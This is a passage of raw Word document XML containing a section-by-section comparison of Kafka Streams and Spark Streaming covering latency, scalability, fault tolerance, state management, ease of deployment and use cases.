          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>real-time processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with low latency (sub-second). It operates at the level of individual messages, with no batching involved, making it ideal for applications requiring real-time stream processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7DA63B" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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No Micro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams operates on a per-event basis, which means messages are processed </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>immediately</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as they arrive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5EF469"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD324DA" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Higher Latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming uses </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>micro-batching</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which processes streams in predefined time windows (e.g., every 1 second, 5 seconds). This introduces a higher latency compared to Kafka Streams, as data is accumulated and then processed in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E39AEB0"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EF7A92" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Lower latency</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for real-time stream processing, which is ideal for applications where quick responses are crucial (e.g., real-time fraud detection, live data monitoring).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3DE458" w14:textId="77777777" w:rsidR="001B47F3"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EBDA50B">
          <v:rect id="_x0000_i3230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DCB61"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3. Scalability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231FFFB0"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA0C64D" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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lastRenderedPageBreak/>
        <w:t>Scalable within a single application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams can scale horizontally by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>splitting the load across multiple instances</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the application, each consuming data from a different partition of the Kafka topic. This allows it to handle higher loads without needing a separate cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE436C3" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Elastic Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams can </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dynamically scale</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> based on the number of Kafka partitions, which is efficient in cloud-based, containerized environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D15B8EC"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056406A9" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Distributed Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>large-scale processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and can scale across a Spark cluster, making it suitable for massive stream processing. However, this scalability comes with the cost of complexity and resource requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69603B76"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD6154E" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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More lightweight and efficient</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for moderate to large-scale processing when running inside the same application and leveraging Kafka partitioning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFC1957" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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No need for a separate cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for stream processing, unlike Spark Streaming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38650DCD" w14:textId="77777777" w:rsidR="001B47F3"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C71710F">
          <v:rect id="_x0000_i3231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CF3A3B"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4. Fault Tolerance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F9AB3A"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2A6F9E" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Built-in Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams provides </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exactly-once semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and has built-in fault tolerance by leveraging </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka’s replication</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer offset management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. If a Kafka Streams instance fails, it can resume processing from where it left off using the offsets stored in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308C5EF"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E2AE2" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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heckpointing and Recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming provides fault tolerance through </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>checkpointing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed recovery</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. However, the overhead of checkpointing and reloading large amounts of state can increase latency and complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DFD766"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E573FD8" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="152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Easier fault tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> due to seamless integration with Kafka’s replication and consumer offset mechanisms, with no additional configuration needed compared to Spark’s checkpointing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64390880" w14:textId="77777777" w:rsidR="001B47F3"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70B3306">
          <v:rect id="_x0000_i3232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B07F7D4"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5. State Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB7E57"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62EAD966" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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tateful Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams supports </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stateful operations</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like aggregations, joins, and windowing with built-in </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state stores</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. These stores are backed by </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka itself</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring that state is fault-tolerant and scalable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A2F964"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15465B48" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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tateful Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming also supports stateful operations, but the state management is done via </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark’s distributed mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., RDDs). This can introduce more overhead when managing state across a distributed environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4728867D"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BC3F20" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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impler and more efficient state management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> since Kafka Streams leverages Kafka’s internal storage, reducing complexity in state handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CEA708" w14:textId="77777777" w:rsidR="001B47F3"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3B16092">
          <v:rect id="_x0000_i3233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AEADA36"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6. Ease of Deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC23091"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE1A8A" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Embedded in the Application</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Kafka Streams is a </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>library</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, meaning you just need to include it in your application, and the application will be able to process streams from Kafka directly. There’s no need for complex setup or maintenance of an additional processing cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDD27AD"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Spark Streaming:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72480850" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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luster Management</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Spark Streaming requires a full-fledged </w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spark cluster</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run, and setting up a Spark cluster can be complex, especially when dealing with cloud environments or managing cluster resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5073D78D"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Advantage of Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07212B0C" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Easier deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it requires minimal infrastructure, running directly inside your application with fewer moving parts compared to Spark Streaming’s cluster-based setup.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7D1147" w14:textId="77777777" w:rsidR="001B47F3"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6D29064">
          <v:rect id="_x0000_i3234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C80D3"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7. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB6E2B0"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Kafka Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C235114" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="153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Real-time event-driven architectures</w:t>
      </w:r>
      <w:r w:rsidRPr="004269A3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where you need to process, filter, aggregate, or transform data directly from Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EA4FA0" w14:textId="77777777" w:rsidR="001B47F3" w:rsidRPr="004269A3" w:rsidRDefault="001B47F3" w:rsidP="004269A3">
